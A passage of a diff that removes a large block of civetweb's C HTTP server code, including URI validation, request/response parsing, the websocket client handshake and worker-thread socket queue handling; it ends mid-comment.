-
-	/* According to the HTTP standard
-	 * http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
-	 * URI can be an asterisk (*) or should start with slash (relative uri),
-	 * or it should start with the protocol (absolute uri). */
-	if ((uri[0] == '*') && (uri[1] == '\0')) {
-		/* asterisk */
-		return 1;
-	}
-
-	/* Valid URIs according to RFC 3986
-	 * (https://www.ietf.org/rfc/rfc3986.txt)
-	 * must only contain reserved characters :/?#[]@!$&'()*+,;=
-	 * and unreserved characters A-Z a-z 0-9 and -._~
-	 * and % encoded symbols.
-	 */
-	for (i = 0; uri[i] != 0; i++) {
-		if (uri[i] < 33) {
-			/* control characters and spaces are invalid */
-			return 0;
-		}
-		if (uri[i] > 126) {
-			/* non-ascii characters must be % encoded */
-			return 0;
-		} else {
-			switch (uri[i]) {
-			case '"':  /* 34 */
-			case '<':  /* 60 */
-			case '>':  /* 62 */
-			case '\\': /* 92 */
-			case '^':  /* 94 */
-			case '`':  /* 96 */
-			case '{':  /* 123 */
-			case '|':  /* 124 */
-			case '}':  /* 125 */
-				return 0;
-			default:
-				/* character is ok */
-				break;
-			}
-		}
-	}
-
-	/* A relative uri starts with a / character */
-	if (uri[0] == '/') {
-		/* relative uri */
-		return 2;
-	}
-
-	/* It could be an absolute uri: */
-	/* This function only checks if the uri is valid, not if it is
-	 * addressing the current server. So civetweb can also be used
-	 * as a proxy server. */
-	for (i = 0; abs_uri_protocols[i].proto != NULL; i++) {
-		if (mg_strncasecmp(uri,
-		                   abs_uri_protocols[i].proto,
-		                   abs_uri_protocols[i].proto_len) == 0) {
-
-			hostend = strchr(uri + abs_uri_protocols[i].proto_len, '/');
-			if (!hostend) {
-				return 0;
-			}
-			portbegin = strchr(uri + abs_uri_protocols[i].proto_len, ':');
-			if (!portbegin) {
-				return 3;
-			}
-
-			port = strtoul(portbegin + 1, &portend, 10);
-			if ((portend != hostend) || (port <= 0) || !is_valid_port(port)) {
-				return 0;
-			}
-
-			return 4;
-		}
-	}
-
-	return 0;
-}
-
-
-/* Return NULL or the relative uri at the current server */
-static const char *
-get_rel_url_at_current_server(const char *uri, const struct mg_connection *conn)
-{
-	const char *server_domain;
-	size_t server_domain_len;
-	size_t request_domain_len = 0;
-	unsigned long port = 0;
-	int i, auth_domain_check_enabled;
-	const char *hostbegin = NULL;
-	const char *hostend = NULL;
-	const char *portbegin;
-	char *portend;
-
-	auth_domain_check_enabled =
-	    !mg_strcasecmp(conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK], "yes");
-
-	if (!auth_domain_check_enabled) {
-		return 0;
-	}
-
-	server_domain = conn->ctx->config[AUTHENTICATION_DOMAIN];
-	if (!server_domain) {
-		return 0;
-	}
-	server_domain_len = strlen(server_domain);
-	if (!server_domain_len) {
-		return 0;
-	}
-
-	/* DNS is case insensitive, so use case insensitive string compare here
-	 */
-	for (i = 0; abs_uri_protocols[i].proto != NULL; i++) {
-		if (mg_strncasecmp(uri,
-		                   abs_uri_protocols[i].proto,
-		                   abs_uri_protocols[i].proto_len) == 0) {
-
-			hostbegin = uri + abs_uri_protocols[i].proto_len;
-			hostend = strchr(hostbegin, '/');
-			if (!hostend) {
-				return 0;
-			}
-			portbegin = strchr(hostbegin, ':');
-			if ((!portbegin) || (portbegin > hostend)) {
-				port = abs_uri_protocols[i].default_port;
-				request_domain_len = (size_t)(hostend - hostbegin);
-			} else {
-				port = strtoul(portbegin + 1, &portend, 10);
-				if ((portend != hostend) || (port <= 0)
-				    || !is_valid_port(port)) {
-					return 0;
-				}
-				request_domain_len = (size_t)(portbegin - hostbegin);
-			}
-			/* protocol found, port set */
-			break;
-		}
-	}
-
-	if (!port) {
-		/* port remains 0 if the protocol is not found */
-		return 0;
-	}
-
-/* Check if the request is directed to a different server. */
-/* First check if the port is the same (IPv4 and IPv6). */
-#if defined(USE_IPV6)
-	if (conn->client.lsa.sa.sa_family == AF_INET6) {
-		if (ntohs(conn->client.lsa.sin6.sin6_port) != port) {
-			/* Request is directed to a different port */
-			return 0;
-		}
-	} else
-#endif
-	{
-		if (ntohs(conn->client.lsa.sin.sin_port) != port) {
-			/* Request is directed to a different port */
-			return 0;
-		}
-	}
-
-	/* Finally check if the server corresponds to the authentication
-	 * domain of the server (the server domain).
-	 * Allow full matches (like http://mydomain.com/path/file.ext), and
-	 * allow subdomain matches (like http://www.mydomain.com/path/file.ext),
-	 * but do not allow substrings (like
-	 * http://notmydomain.com/path/file.ext
-	 * or http://mydomain.com.fake/path/file.ext).
-	 */
-	if (auth_domain_check_enabled) {
-		if ((request_domain_len == server_domain_len)
-		    && (!memcmp(server_domain, hostbegin, server_domain_len))) {
-			/* Request is directed to this server - full name match. */
-		} else {
-			if (request_domain_len < (server_domain_len + 2)) {
-				/* Request is directed to another server: The server name is
-				 * longer
-				 * than
-				 * the request name. Drop this case here to avoid overflows
-				 * in
-				 * the
-				 * following checks. */
-				return 0;
-			}
-			if (hostbegin[request_domain_len - server_domain_len - 1] != '.') {
-				/* Request is directed to another server: It could be a
-				 * substring
-				 * like notmyserver.com */
-				return 0;
-			}
-			if (0 != memcmp(server_domain,
-			                hostbegin + request_domain_len - server_domain_len,
-			                server_domain_len)) {
-				/* Request is directed to another server:
-				 * The server name is different. */
-				return 0;
-			}
-		}
-	}
-
-	return hostend;
-}
-
-
-static int
-get_message(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-	*err = 0;
-
-	reset_per_request_attributes(conn);
-
-	if (!conn) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Internal error");
-		*err = 500;
-		return 0;
-	}
-	/* Set the time the request was received. This value should be used for
-	 * timeouts. */
-	clock_gettime(CLOCK_MONOTONIC, &(conn->req_time));
-
-	conn->request_len =
-	    read_message(NULL, conn, conn->buf, conn->buf_size, &conn->data_len);
-	/* assert(conn->request_len < 0 || conn->data_len >= conn->request_len);
-	 */
-	if ((conn->request_len >= 0) && (conn->data_len < conn->request_len)) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Invalid message size");
-		*err = 500;
-		return 0;
-	}
-
-	if ((conn->request_len == 0) && (conn->data_len == conn->buf_size)) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Message too large");
-		*err = 413;
-		return 0;
-	}
-
-	if (conn->request_len <= 0) {
-		if (conn->data_len > 0) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Malformed message");
-			*err = 400;
-		} else {
-			/* Server did not recv anything -> just close the connection */
-			conn->must_close = 1;
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "No data received");
-			*err = 0;
-		}
-		return 0;
-	}
-	return 1;
-}
-
-
-static int
-get_request(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	const char *cl;
-	if (!get_message(conn, ebuf, ebuf_len, err)) {
-		return 0;
-	}
-
-	if (parse_http_request(conn->buf, conn->buf_size, &conn->request_info)
-	    <= 0) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Bad request");
-		*err = 400;
-		return 0;
-	}
-
-	/* Message is a valid request */
-	if ((cl = get_header(conn->request_info.http_headers,
-	                     conn->request_info.num_headers,
-	                     "Content-Length")) != NULL) {
-		/* Request/response has content length set */
-		char *endptr = NULL;
-		conn->content_len = strtoll(cl, &endptr, 10);
-		if (endptr == cl) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Bad request");
-			*err = 411;
-			return 0;
-		}
-		/* Publish the content length back to the request info. */
-		conn->request_info.content_length = conn->content_len;
-	} else if ((cl = get_header(conn->request_info.http_headers,
-	                            conn->request_info.num_headers,
-	                            "Transfer-Encoding")) != NULL
-	           && !mg_strcasecmp(cl, "chunked")) {
-		conn->is_chunked = 1;
-		conn->content_len = -1; /* unknown content length */
-	} else if (get_http_method_info(conn->request_info.request_method)
-	               ->request_has_body) {
-		/* POST or PUT request without content length set */
-		conn->content_len = -1; /* unknown content length */
-	} else {
-		/* Other request */
-		conn->content_len = 0; /* No content */
-	}
-
-	conn->connection_type = CONNECTION_TYPE_REQUEST; /* Valid request */
-	return 1;
-}
-
-
-/* conn is assumed to be valid in this internal function */
-static int
-get_response(struct mg_connection *conn, char *ebuf, size_t ebuf_len, int *err)
-{
-	const char *cl;
-	if (!get_message(conn, ebuf, ebuf_len, err)) {
-		return 0;
-	}
-
-	if (parse_http_response(conn->buf, conn->buf_size, &conn->response_info)
-	    <= 0) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Bad response");
-		*err = 400;
-		return 0;
-	}
-
-	/* Message is a valid response */
-	if ((cl = get_header(conn->response_info.http_headers,
-	                     conn->response_info.num_headers,
-	                     "Content-Length")) != NULL) {
-		/* Request/response has content length set */
-		char *endptr = NULL;
-		conn->content_len = strtoll(cl, &endptr, 10);
-		if (endptr == cl) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Bad request");
-			*err = 411;
-			return 0;
-		}
-		/* Publish the content length back to the response info. */
-		conn->response_info.content_length = conn->content_len;
-
-		/* TODO: check if it is still used in response_info */
-		conn->request_info.content_length = conn->content_len;
-
-	} else if ((cl = get_header(conn->response_info.http_headers,
-	                            conn->response_info.num_headers,
-	                            "Transfer-Encoding")) != NULL
-	           && !mg_strcasecmp(cl, "chunked")) {
-		conn->is_chunked = 1;
-		conn->content_len = -1; /* unknown content length */
-	} else {
-		conn->content_len = -1; /* unknown content length */
-	}
-
-	conn->connection_type = CONNECTION_TYPE_RESPONSE; /* Valid response */
-	return 1;
-}
-
-
-int
-mg_get_response(struct mg_connection *conn,
-                char *ebuf,
-                size_t ebuf_len,
-                int timeout)
-{
-	int err, ret;
-	char txt[32]; /* will not overflow */
-	struct mg_context *octx;
-	struct mg_context rctx;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-
-	if (!conn) {
-		mg_snprintf(conn,
-		            NULL, /* No truncation check for ebuf */
-		            ebuf,
-		            ebuf_len,
-		            "%s",
-		            "Parameter error");
-		return -1;
-	}
-
-	/* Implementation of API function for HTTP clients */
-	octx = conn->ctx;
-	rctx = *(conn->ctx);
-
-	if (timeout >= 0) {
-		mg_snprintf(conn, NULL, txt, sizeof(txt), "%i", timeout);
-		rctx.config[REQUEST_TIMEOUT] = txt;
-		/* Not required for non-blocking sockets.
-		set_sock_timeout(conn->client.sock, timeout);
-		*/
-	} else {
-		rctx.config[REQUEST_TIMEOUT] = NULL;
-	}
-
-	conn->ctx = &rctx;
-	ret = get_response(conn, ebuf, ebuf_len, &err);
-	conn->ctx = octx;
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* TODO: 1) uri is deprecated;
-	 *       2) here, ri.uri is the http response code */
-	conn->request_info.uri = conn->request_info.request_uri;
-#endif
-	conn->request_info.local_uri = conn->request_info.request_uri;
-
-	/* TODO (mid): Define proper return values - maybe return length?
-	 * For the first test use <0 for error and >0 for OK */
-	return (ret == 0) ? -1 : +1;
-}
-
-
-struct mg_connection *
-mg_download(const char *host,
-            int port,
-            int use_ssl,
-            char *ebuf,
-            size_t ebuf_len,
-            const char *fmt,
-            ...)
-{
-	struct mg_connection *conn;
-	va_list ap;
-	int i;
-	int reqerr;
-
-	if (ebuf_len > 0) {
-		ebuf[0] = '\0';
-	}
-
-	va_start(ap, fmt);
-
-	/* open a connection */
-	conn = mg_connect_client(host, port, use_ssl, ebuf, ebuf_len);
-
-	if (conn != NULL) {
-		i = mg_vprintf(conn, fmt, ap);
-		if (i <= 0) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            ebuf_len,
-			            "%s",
-			            "Error sending request");
-		} else {
-			get_response(conn, ebuf, ebuf_len, &reqerr);
-
-#if defined(MG_LEGACY_INTERFACE)
-			/* TODO: 1) uri is deprecated;
-			 *       2) here, ri.uri is the http response code */
-			conn->request_info.uri = conn->request_info.request_uri;
-#endif
-			conn->request_info.local_uri = conn->request_info.request_uri;
-		}
-	}
-
-	/* if an error occured, close the connection */
-	if ((ebuf[0] != '\0') && (conn != NULL)) {
-		mg_close_connection(conn);
-		conn = NULL;
-	}
-
-	va_end(ap);
-	return conn;
-}
-
-
-struct websocket_client_thread_data {
-	struct mg_connection *conn;
-	mg_websocket_data_handler data_handler;
-	mg_websocket_close_handler close_handler;
-	void *callback_data;
-};
-
-
-#if defined(USE_WEBSOCKET)
-#ifdef _WIN32
-static unsigned __stdcall websocket_client_thread(void *data)
-#else
-static void *
-websocket_client_thread(void *data)
-#endif
-{
-	struct websocket_client_thread_data *cdata =
-	    (struct websocket_client_thread_data *)data;
-
-	mg_set_thread_name("ws-clnt");
-
-	if (cdata->conn->ctx) {
-		if (cdata->conn->ctx->callbacks.init_thread) {
-			/* 3 indicates a websocket client thread */
-			/* TODO: check if conn->ctx can be set */
-			cdata->conn->ctx->callbacks.init_thread(cdata->conn->ctx, 3);
-		}
-	}
-
-	read_websocket(cdata->conn, cdata->data_handler, cdata->callback_data);
-
-	DEBUG_TRACE("%s", "Websocket client thread exited\n");
-
-	if (cdata->close_handler != NULL) {
-		cdata->close_handler(cdata->conn, cdata->callback_data);
-	}
-
-	/* The websocket_client context has only this thread. If it runs out,
-	   set the stop_flag to 2 (= "stopped"). */
-	cdata->conn->ctx->stop_flag = 2;
-
-	mg_free((void *)cdata);
-
-#ifdef _WIN32
-	return 0;
-#else
-	return NULL;
-#endif
-}
-#endif
-
-
-struct mg_connection *
-mg_connect_websocket_client(const char *host,
-                            int port,
-                            int use_ssl,
-                            char *error_buffer,
-                            size_t error_buffer_size,
-                            const char *path,
-                            const char *origin,
-                            mg_websocket_data_handler data_func,
-                            mg_websocket_close_handler close_func,
-                            void *user_data)
-{
-	struct mg_connection *conn = NULL;
-
-#if defined(USE_WEBSOCKET)
-	struct mg_context *newctx = NULL;
-	struct websocket_client_thread_data *thread_data;
-	static const char *magic = "x3JJHMbDL1EzLkh9GBhXDw==";
-	static const char *handshake_req;
-
-	if (origin != NULL) {
-		handshake_req = "GET %s HTTP/1.1\r\n"
-		                "Host: %s\r\n"
-		                "Upgrade: websocket\r\n"
-		                "Connection: Upgrade\r\n"
-		                "Sec-WebSocket-Key: %s\r\n"
-		                "Sec-WebSocket-Version: 13\r\n"
-		                "Origin: %s\r\n"
-		                "\r\n";
-	} else {
-		handshake_req = "GET %s HTTP/1.1\r\n"
-		                "Host: %s\r\n"
-		                "Upgrade: websocket\r\n"
-		                "Connection: Upgrade\r\n"
-		                "Sec-WebSocket-Key: %s\r\n"
-		                "Sec-WebSocket-Version: 13\r\n"
-		                "\r\n";
-	}
-
-	/* Establish the client connection and request upgrade */
-	conn = mg_download(host,
-	                   port,
-	                   use_ssl,
-	                   error_buffer,
-	                   error_buffer_size,
-	                   handshake_req,
-	                   path,
-	                   host,
-	                   magic,
-	                   origin);
-
-	/* Connection object will be null if something goes wrong */
-	if (conn == NULL) {
-		if (!*error_buffer) {
-			/* There should be already an error message */
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            error_buffer,
-			            error_buffer_size,
-			            "Unexpected error");
-		}
-		return NULL;
-	}
-
-	if (conn->response_info.status_code != 101) {
-		/* We sent an "upgrade" request. For a correct websocket
-		 * protocol handshake, we expect a "101 Continue" response.
-		 * Otherwise it is a protocol violation. Maybe the HTTP
-		 * Server does not know websockets. */
-		if (!*error_buffer) {
-			/* set an error, if not yet set */
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            error_buffer,
-			            error_buffer_size,
-			            "Unexpected server reply");
-		}
-
-		DEBUG_TRACE("Websocket client connect error: %s\r\n", error_buffer);
-		mg_free(conn);
-		return NULL;
-	}
-
-	/* For client connections, mg_context is fake. Since we need to set a
-	 * callback function, we need to create a copy and modify it. */
-	newctx = (struct mg_context *)mg_malloc(sizeof(struct mg_context));
-	memcpy(newctx, conn->ctx, sizeof(struct mg_context));
-	newctx->user_data = user_data;
-	newctx->context_type = CONTEXT_WS_CLIENT; /* ws/wss client context */
-	newctx->cfg_worker_threads = 1; /* one worker thread will be created */
-	newctx->worker_threadids =
-	    (pthread_t *)mg_calloc_ctx(newctx->cfg_worker_threads,
-	                               sizeof(pthread_t),
-	                               newctx);
-	conn->ctx = newctx;
-	thread_data = (struct websocket_client_thread_data *)
-	    mg_calloc_ctx(sizeof(struct websocket_client_thread_data), 1, newctx);
-	thread_data->conn = conn;
-	thread_data->data_handler = data_func;
-	thread_data->close_handler = close_func;
-	thread_data->callback_data = user_data;
-
-	/* Start a thread to read the websocket client connection
-	 * This thread will automatically stop when mg_disconnect is
-	 * called on the client connection */
-	if (mg_start_thread_with_id(websocket_client_thread,
-	                            (void *)thread_data,
-	                            newctx->worker_threadids) != 0) {
-		mg_free((void *)thread_data);
-		mg_free((void *)newctx->worker_threadids);
-		mg_free((void *)newctx);
-		mg_free((void *)conn);
-		conn = NULL;
-		DEBUG_TRACE("%s",
-		            "Websocket client connect thread could not be started\r\n");
-	}
-
-#else
-	/* Appease "unused parameter" warnings */
-	(void)host;
-	(void)port;
-	(void)use_ssl;
-	(void)error_buffer;
-	(void)error_buffer_size;
-	(void)path;
-	(void)origin;
-	(void)user_data;
-	(void)data_func;
-	(void)close_func;
-#endif
-
-	return conn;
-}
-
-
-/* Prepare connection data structure */
-static void
-init_connection(struct mg_connection *conn)
-{
-	/* Is keep alive allowed by the server */
-	int keep_alive_enabled =
-	    !mg_strcasecmp(conn->ctx->config[ENABLE_KEEP_ALIVE], "yes");
-
-	if (!keep_alive_enabled) {
-		conn->must_close = 1;
-	}
-
-	/* Important: on new connection, reset the receiving buffer. Credit
-	 * goes to crule42. */
-	conn->data_len = 0;
-	conn->handled_requests = 0;
-	mg_set_user_connection_data(conn, NULL);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 2; /* init */
-#endif
-
-	/* call the init_connection callback if assigned */
-	if (conn->ctx->callbacks.init_connection != NULL) {
-		if (conn->ctx->context_type == CONTEXT_SERVER) {
-			void *conn_data = NULL;
-			conn->ctx->callbacks.init_connection(conn, &conn_data);
-			mg_set_user_connection_data(conn, conn_data);
-		}
-	}
-}
-
-
-/* Process a connection - may handle multiple requests
- * using the same connection.
- * Must be called with a valid connection (conn  and
- * conn->ctx must be valid).
- */
-static void
-process_new_connection(struct mg_connection *conn)
-{
-	struct mg_request_info *ri = &conn->request_info;
-	int keep_alive, discard_len;
-	char ebuf[100];
-	const char *hostend;
-	int reqerr, uri_type;
-
-#if defined(USE_SERVER_STATS)
-	int mcon = mg_atomic_inc(&(conn->ctx->active_connections));
-	mg_atomic_add(&(conn->ctx->total_connections), 1);
-	if (mcon > (conn->ctx->max_connections)) {
-		/* could use atomic compare exchange, but this
-		 * seems overkill for statistics data */
-		conn->ctx->max_connections = mcon;
-	}
-#endif
-
-	init_connection(conn);
-
-	DEBUG_TRACE("Start processing connection from %s",
-	            conn->request_info.remote_addr);
-
-	/* Loop over multiple requests sent using the same connection
-	 * (while "keep alive"). */
-	do {
-
-		DEBUG_TRACE("calling get_request (%i times for this connection)",
-		            conn->handled_requests + 1);
-
-#if defined(USE_SERVER_STATS)
-		conn->conn_state = 3; /* ready */
-#endif
-
-		if (!get_request(conn, ebuf, sizeof(ebuf), &reqerr)) {
-			/* The request sent by the client could not be understood by
-			 * the server, or it was incomplete or a timeout. Send an
-			 * error message and close the connection. */
-			if (reqerr > 0) {
-				/*assert(ebuf[0] != '\0');*/
-				mg_send_http_error(conn, reqerr, "%s", ebuf);
-			}
-		} else if (strcmp(ri->http_version, "1.0")
-		           && strcmp(ri->http_version, "1.1")) {
-			mg_snprintf(conn,
-			            NULL, /* No truncation check for ebuf */
-			            ebuf,
-			            sizeof(ebuf),
-			            "Bad HTTP version: [%s]",
-			            ri->http_version);
-			mg_send_http_error(conn, 505, "%s", ebuf);
-		}
-
-		if (ebuf[0] == '\0') {
-			uri_type = get_uri_type(conn->request_info.request_uri);
-			switch (uri_type) {
-			case 1:
-				/* Asterisk */
-				conn->request_info.local_uri = NULL;
-				break;
-			case 2:
-				/* relative uri */
-				conn->request_info.local_uri = conn->request_info.request_uri;
-				break;
-			case 3:
-			case 4:
-				/* absolute uri (with/without port) */
-				hostend = get_rel_url_at_current_server(
-				    conn->request_info.request_uri, conn);
-				if (hostend) {
-					conn->request_info.local_uri = hostend;
-				} else {
-					conn->request_info.local_uri = NULL;
-				}
-				break;
-			default:
-				mg_snprintf(conn,
-				            NULL, /* No truncation check for ebuf */
-				            ebuf,
-				            sizeof(ebuf),
-				            "Invalid URI");
-				mg_send_http_error(conn, 400, "%s", ebuf);
-				conn->request_info.local_uri = NULL;
-				break;
-			}
-
-#if defined(MG_LEGACY_INTERFACE)
-			/* Legacy before split into local_uri and request_uri */
-			conn->request_info.uri = conn->request_info.local_uri;
-#endif
-		}
-
-		DEBUG_TRACE("http: %s, error: %s",
-		            (ri->http_version ? ri->http_version : "none"),
-		            (ebuf[0] ? ebuf : "none"));
-
-		if (ebuf[0] == '\0') {
-			if (conn->request_info.local_uri) {
-
-/* handle request to local server */
-#if defined(USE_SERVER_STATS)
-				conn->conn_state = 4; /* processing */
-#endif
-				handle_request(conn);
-
-#if defined(USE_SERVER_STATS)
-				conn->conn_state = 5; /* processed */
-
-				mg_atomic_add(&(conn->ctx->total_data_read),
-				              conn->consumed_content);
-				mg_atomic_add(&(conn->ctx->total_data_written),
-				              conn->num_bytes_sent);
-#endif
-
-				DEBUG_TRACE("%s", "handle_request done");
-
-				if (conn->ctx->callbacks.end_request != NULL) {
-					conn->ctx->callbacks.end_request(conn, conn->status_code);
-					DEBUG_TRACE("%s", "end_request callback done");
-				}
-				log_access(conn);
-			} else {
-				/* TODO: handle non-local request (PROXY) */
-				conn->must_close = 1;
-			}
-		} else {
-			conn->must_close = 1;
-		}
-
-		if (ri->remote_user != NULL) {
-			mg_free((void *)ri->remote_user);
-			/* Important! When having connections with and without auth
-			 * would cause double free and then crash */
-			ri->remote_user = NULL;
-		}
-
-		/* NOTE(lsm): order is important here. should_keep_alive() call
-		 * is using parsed request, which will be invalid after
-		 * memmove's below.
-		 * Therefore, memorize should_keep_alive() result now for later
-		 * use in loop exit condition. */
-		keep_alive = (conn->ctx->stop_flag == 0) && should_keep_alive(conn)
-		             && (conn->content_len >= 0);
-
-
-		/* Discard all buffered data for this request */
-		discard_len = ((conn->content_len >= 0) && (conn->request_len > 0)
-		               && ((conn->request_len + conn->content_len)
-		                   < (int64_t)conn->data_len))
-		                  ? (int)(conn->request_len + conn->content_len)
-		                  : conn->data_len;
-		/*assert(discard_len >= 0);*/
-		if (discard_len < 0) {
-			DEBUG_TRACE("internal error: discard_len = %li",
-			            (long int)discard_len);
-			break;
-		}
-		conn->data_len -= discard_len;
-		if (conn->data_len > 0) {
-			DEBUG_TRACE("discard_len = %lu", (long unsigned)discard_len);
-			memmove(conn->buf, conn->buf + discard_len, (size_t)conn->data_len);
-		}
-
-		/* assert(conn->data_len >= 0); */
-		/* assert(conn->data_len <= conn->buf_size); */
-
-		if ((conn->data_len < 0) || (conn->data_len > conn->buf_size)) {
-			DEBUG_TRACE("internal error: data_len = %li, buf_size = %li",
-			            (long int)conn->data_len,
-			            (long int)conn->buf_size);
-			break;
-		}
-
-		conn->handled_requests++;
-
-	} while (keep_alive);
-
-	DEBUG_TRACE("Done processing connection from %s (%f sec)",
-	            conn->request_info.remote_addr,
-	            difftime(time(NULL), conn->conn_birth_time));
-
-	close_connection(conn);
-
-#if defined(USE_SERVER_STATS)
-	mg_atomic_add(&(conn->ctx->total_requests), conn->handled_requests);
-	mg_atomic_dec(&(conn->ctx->active_connections));
-#endif
-}
-
-
-#if defined(ALTERNATIVE_QUEUE)
-
-static void
-produce_socket(struct mg_context *ctx, const struct socket *sp)
-{
-	unsigned int i;
-
-	for (;;) {
-		for (i = 0; i < ctx->cfg_worker_threads; i++) {
-			/* find a free worker slot and signal it */
-			if (ctx->client_socks[i].in_use == 0) {
-				ctx->client_socks[i] = *sp;
-				ctx->client_socks[i].in_use = 1;
-				event_signal(ctx->client_wait_events[i]);
-				return;
-			}
-		}
-		/* queue is full */
-		mg_sleep(1);
-	}
-}
-
-
-static int
-consume_socket(struct mg_context *ctx, struct socket *sp, int thread_index)
-{
-	DEBUG_TRACE("%s", "going idle");
-	ctx->client_socks[thread_index].in_use = 0;
-	event_wait(ctx->client_wait_events[thread_index]);
-	*sp = ctx->client_socks[thread_index];
-	DEBUG_TRACE("grabbed socket %d, going busy", sp ? sp->sock : -1);
-
-	return !ctx->stop_flag;
-}
-
-#else /* ALTERNATIVE_QUEUE */
-
-/* Worker threads take accepted socket from the queue */
-static int
-consume_socket(struct mg_context *ctx, struct socket *sp, int thread_index)
-{
-#define QUEUE_SIZE(ctx) ((int)(ARRAY_SIZE(ctx->queue)))
-
-	(void)thread_index;
-
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-	DEBUG_TRACE("%s", "going idle");
-
-	/* If the queue is empty, wait. We're idle at this point. */
-	while ((ctx->sq_head == ctx->sq_tail) && (ctx->stop_flag == 0)) {
-		pthread_cond_wait(&ctx->sq_full, &ctx->thread_mutex);
-	}
-
-	/* If we're stopping, sq_head may be equal to sq_tail. */
-	if (ctx->sq_head > ctx->sq_tail) {
-		/* Copy socket from the queue and increment tail */
-		*sp = ctx->queue[ctx->sq_tail % QUEUE_SIZE(ctx)];
-		ctx->sq_tail++;
-
-		DEBUG_TRACE("grabbed socket %d, going busy", sp ? sp->sock : -1);
-
-		/* Wrap pointers if needed */
-		while (ctx->sq_tail > QUEUE_SIZE(ctx)) {
-			ctx->sq_tail -= QUEUE_SIZE(ctx);
-			ctx->sq_head -= QUEUE_SIZE(ctx);
-		}
-	}
-
-	(void)pthread_cond_signal(&ctx->sq_empty);
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-
-	return !ctx->stop_flag;
-#undef QUEUE_SIZE
-}
-
-
-/* Master thread adds accepted socket to a queue */
-static void
-produce_socket(struct mg_context *ctx, const struct socket *sp)
-{
-#define QUEUE_SIZE(ctx) ((int)(ARRAY_SIZE(ctx->queue)))
-	if (!ctx) {
-		return;
-	}
-	(void)pthread_mutex_lock(&ctx->thread_mutex);
-
-	/* If the queue is full, wait */
-	while ((ctx->stop_flag == 0)
-	       && (ctx->sq_head - ctx->sq_tail >= QUEUE_SIZE(ctx))) {
-		(void)pthread_cond_wait(&ctx->sq_empty, &ctx->thread_mutex);
-	}
-
-	if (ctx->sq_head - ctx->sq_tail < QUEUE_SIZE(ctx)) {
-		/* Copy socket to the queue and increment head */
-		ctx->queue[ctx->sq_head % QUEUE_SIZE(ctx)] = *sp;
-		ctx->sq_head++;
-		DEBUG_TRACE("queued socket %d", sp ? sp->sock : -1);
-	}
-
-	(void)pthread_cond_signal(&ctx->sq_full);
-	(void)pthread_mutex_unlock(&ctx->thread_mutex);
-#undef QUEUE_SIZE
-}
-#endif /* ALTERNATIVE_QUEUE */
-
-
-struct worker_thread_args {
-	struct mg_context *ctx;
-	int index;
-};
-
-
-static void *
-worker_thread_run(struct worker_thread_args *thread_args)
-{
-	struct mg_context *ctx = thread_args->ctx;
-	struct mg_connection *conn;
-	struct mg_workerTLS tls;
-#if defined(MG_LEGACY_INTERFACE)
-	uint32_t addr;
-#endif
-
-	mg_set_thread_name("worker");
-
-	tls.is_master = 0;
-	tls.thread_idx = (unsigned)mg_atomic_inc(&thread_idx_max);
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-	tls.pthread_cond_helper_mutex = CreateEvent(NULL, FALSE, FALSE, NULL);
-#endif
-
-	/* Initialize thread local storage before calling any callback */
-	pthread_setspecific(sTlsKey, &tls);
-
-	if (ctx->callbacks.init_thread) {
-		/* call init_thread for a worker thread (type 1) */
-		ctx->callbacks.init_thread(ctx, 1);
-	}
-
-	/* Connection structure has been pre-allocated */
-	if (((int)thread_args->index < 0)
-	    || ((unsigned)thread_args->index
-	        >= (unsigned)ctx->cfg_worker_threads)) {
-		mg_cry(fc(ctx),
-		       "Internal error: Invalid worker index %i",
-		       (int)thread_args->index);
-		return NULL;
-	}
-	conn = ctx->worker_connections + thread_args->index;
-
-	/* Request buffers are not pre-allocated. They are private to the
-	 * request and do not contain any state information that might be
-	 * of interest to anyone observing a server status.  */
-	conn->buf = (char *)mg_malloc_ctx(ctx->max_request_size, conn->ctx);
-	if (conn->buf == NULL) {
-		mg_cry(fc(ctx),
-		       "Out of memory: Cannot allocate buffer for worker %i",
-		       (int)thread_args->index);
-		return NULL;
-	}
-	conn->buf_size = (int)ctx->max_request_size;
-
-	conn->ctx = ctx;
-	conn->thread_index = thread_args->index;
-	conn->request_info.user_data = ctx->user_data;
-	/* Allocate a mutex for this connection to allow communication both
-	 * within the request handler and from elsewhere in the application
-	 */
-	(void)pthread_mutex_init(&conn->mutex, &pthread_mutex_attr);
-
-#if defined(USE_SERVER_STATS)
-	conn->conn_state = 1; /* not consumed */
-#endif
-
-	/* Call consume_socket() even when ctx->stop_flag > 0, to let it
-	 * signal sq_empty condvar to wake up the master waiting in
